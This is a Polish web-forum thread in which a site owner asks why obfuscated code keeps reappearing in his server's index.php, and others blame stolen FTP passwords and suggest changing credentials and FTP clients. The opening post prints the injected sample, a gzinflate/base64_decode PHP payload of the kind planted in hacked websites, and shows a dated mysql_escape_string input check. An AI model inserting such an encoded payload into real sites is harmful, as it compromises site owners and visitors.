Witam, mam spory problem z jedną stronką którą ktoś od kilku m-cy atakuje wirusami zmieniając pliki na serwerze dopisując kody, jeden z nich to:

[PHP] pobierz, plaintext 
  <?php   
#d93065#
echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO
6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIE
VQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpg
huJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6
KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBq
pNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxay
vo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW
8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B")));
#/d93065#
?>
[PHP] pobierz, plaintext 

wie ktoś o co chodzi i jak mogę się zabezpieczyć?


dodam, że zmienne w plikach zabezpieczyłem tak:

[PHP] pobierz, plaintext 
 $pobiez_sekcje = mysql_escape_string($_GET['id1']);
                	//jak pobrana zmienna jest liczbą - zabezpieczenie przed zmodyfikowaniem linku o jakieś niedozwolone znaki
                	if (is_numeric($pobiez_sekcje)) {
			  				$sekcja = $pobiez_sekcje;
[PHP] pobierz, plaintext 

nie wiem co jeszcze mogę zrobić


bardzo proszę o jakiekolwiek wskazówki

Witaj.

Coś podobnego było kiedyś na home.pl.
Była to wina hostera - złapali wirusa na wszystkich serwerach.
Może jakiś inny użytkownik pamięta takie zdarzenie.

Pozdrawiam.

dzięki za pomoc, czyli powinienem się skontaktować z właścicielem serwera, ale jedno mnie gnębi - na ich stronie jest wszystko OK (nie mają wirusa), czy to możliwe że atakuje tylko jeden katalog na serwerze?

dzięki i pozdrawiam

Używasz może Total Commandera? Kiedyś był jakiś wirus wykradający z niego hasła i doklejający do plików na serwerze jakiś kod. Jeżeli używasz to radzę zmienić wersję na nową, nie zapamiętywać hasła w programie, oraz zmienić je na inne.

używam TC, ale ja nie mam zainfekowanego komputera, poza tym jak nadpiszę plik index.php (bo on głównie jest atakowany) to jakiś czas mam spokój i po kilku dniach znowu plik index.php jest zarażony, przy czym ja w tym czasie nie korzystałem z TC.

Pamiętasz może jaki to był wirus, żebym się trochę o nim dowiedział?

Napisałem abyś poczekał na innych użytkowników którzy mogliby potwierdzić moją wersję.
Ja po prostu nie jestem pewien czy to wina hostera. Po prostu coś takiego pamiętam z przeszłości, ale możliwe, że gadam głupoty. Ja mogę się mylić.
Zanim napiszesz do obsługi hostingu - poczekaj aż wątek się rozwinie.

Zapoznaj się z wynikami google: https://www.google.pl/search?q=total+commander+wirus
Nie musisz korzystać w tym czasie z TC, wystarczy że masz w nim zapamiętane hasło.

Piszę to jako osoba pracująca przy hostingu. W 99% przypadku jest to wina przechwyconego hasła. Podmiana plików nic nie daje za to zmiana dostępów zawsze przerywała ten proceder. Hasło najlepiej zapamiętać i wpisywać z palca albo przeklejać z innego miejsca.

Z tym, że to zawsze wina zapamiętywania hasła nie do końca sie mogę zgodzić. Używam Filezilli. Nie zapamiętuję haseł. Podobny syf wlazł na serwisy. Pliki wszystkich serwisów na local zdarte i wyczyszczone. Hasła nie były zapamiętywane. Po 2 dniach powtórka z rozrywki. Znowu zabawa... i po kolejnych 2 znów to samo Teraz na dzien dobry sprawdzam ten hosting jak tylko do pracy przychodzę. Zabawa trwa od około 2 tygodni. Nawet już do tego serwera konfiigurację połaczenia usunąłem (nie tylko nie zapamiętuję hasła, ale nie mam nawet adresu ip czy loginu - wszystko z palca wpisywane). Jeśli w ciągu weekendu coś się wbije - pisze do hostingu.

Połączenie może zostać zapamiętane. Ja po zmianie dostępów FTP maiłem (i klient miał) już z tym spokój. Część tego typu syfu instaluje się też poprzez dziury w skryptach ale cześciej takie dziury wykorzystywane są do deface www.

Najlepiej nie używać popularnych klientów ftp i nie zapamiętywać haseł. Ale to nie wszystko, bo nikt nie zabrania próby wbicia się przez ftp przy pomocy słownika lub bf - dlatego radzę też używać haseł innych niż "kotek"

Zgaduję że te problemy macie korzystając z systemu windows? A czy TC lub innego klienta FTP nie można zmusić do korzystania z jakiegoś menadżera haseł? To by załatwiło sprawę.

Korzystam z TC, slyszalem o problemie z haslami ale bardzo odpowiada mi ten program ( moze z racji tego, ze wychowalem sie na norton commanderze- zwykle przyzwyczajenie ), dlatego staram sie zawsze do hasla dopisywac na koncu jeden znak, podczas logowania oczywiscie mam odrzut, wybieram 'wprowadz powonie dane', usuwam ostatni znak i smiga. Haslo dalej jest zapamietane, ale w "niby" zakodowanej postaci : ) Taki prymitywny sposob, ale dziala.

Teraz znacznie bardziej popularne jest WinSCP. A wygląd i działanie jak w TC. Nie słyszałem też żeby ktoś hasła w nim stracił.

A co myślicie o PUTTY?

Używam, ale jedynie przy łączeniu z SSH